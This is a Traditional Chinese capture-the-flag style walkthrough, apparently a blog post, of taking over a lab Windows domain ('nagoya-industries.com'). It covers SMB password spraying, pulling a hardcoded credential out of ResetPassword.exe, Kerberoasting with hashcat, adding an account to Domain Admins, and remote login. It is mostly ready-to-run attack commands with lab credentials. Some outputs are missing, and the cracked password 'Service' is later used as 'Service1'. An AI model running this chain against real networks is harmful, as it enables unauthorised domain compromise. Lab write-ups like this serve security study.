nmap -sC -sV -p- <ip>
掃描結果:
確定這是一台屬於 nagoya-industries.com 網域的 Windows Server。
dirsearch http://<ip>/
找到 /team 頁面,裡面列出員工名單。推測帳號格式為 Firstname.Lastname。
建立 user.txt 並準備進行帳號爆破。
smbclient -N -L \\\\<ip>\\
匿名登入成功,但共享內容受限。enum4linux 顯示:
crackmapexec smb <ip> -u user.txt -p "Summer2023" --shares
成功取得帳密:
Fiona.Clark:Summer2023
登入共享資料夾:
smbclient //<ip>/SYSVOL -U "nagoya-industries.com\Fiona.Clark%Summer2023"
下載全部內容,發現:
SYSVOL/nagoya-industries.com/scripts/ResetPassword/
ResetPassword.exe
ResetPassword.exe.config
System.Security.*.dll
同時在 NETLOGON 也有同樣資料夾,顯然是自動部署腳本。
反編譯程式取得新憑證
使用 strings -e l ResetPassword.exe 從執行檔中讀取字串,成功找到憑證:svc_helpdesk:U299iYRmikYTHDbPbxPoYYfa2j4x4cdg
4. Kerberoasting
使用 svc_helpdesk 登入進行 Kerberoast:
impacket-GetUserSPNs nagoya-industries.com/svc_helpdesk:U299iYRmikYTHDbPbxPoYYfa2j4x4cdg -dc-ip <ip> -request
取得兩組服務帳號的 TGS Hash:
用 Hashcat 嘗試破解:
hashcat -m 13100 -a 0 mssql.hash /usr/share/wordlists/rockyou.txt
成功得到:svc_mssql:Service
RPC 列舉與群組分析
rpcclient -U "nagoya-industries.com\\svc_mssql" 192.168.122.21
rpcclient $> enumdomgroups
rpcclient $> querygroupmem 0x200
結果顯示:
使用 BloodHound 進行完整枚舉:
bloodhound-python -u svc_mssql -p Service1 -d nagoya-industries.com -gc 192.168.122.21 -c all
分析路徑後發現:
net rpc group addmem "Domain Admins" svc_mssql -U "nagoya-industries.com\\svc_mssql%Service1" -S 192.168.122.21
驗證權限後,svc_mssql 已屬於 Domain Admins。
7. 取得完整控制權
登入 RDP:
xfreerdp /u:svc_mssql /p:Service1 /v:192.168.122.21
或利用 WinRM:
evil-winrm -i 192.168.122.21 -u svc_mssql -p Service1
成功進入系統後,確認具備系統管理員權限。
iThome鐵人賽
看影片追技術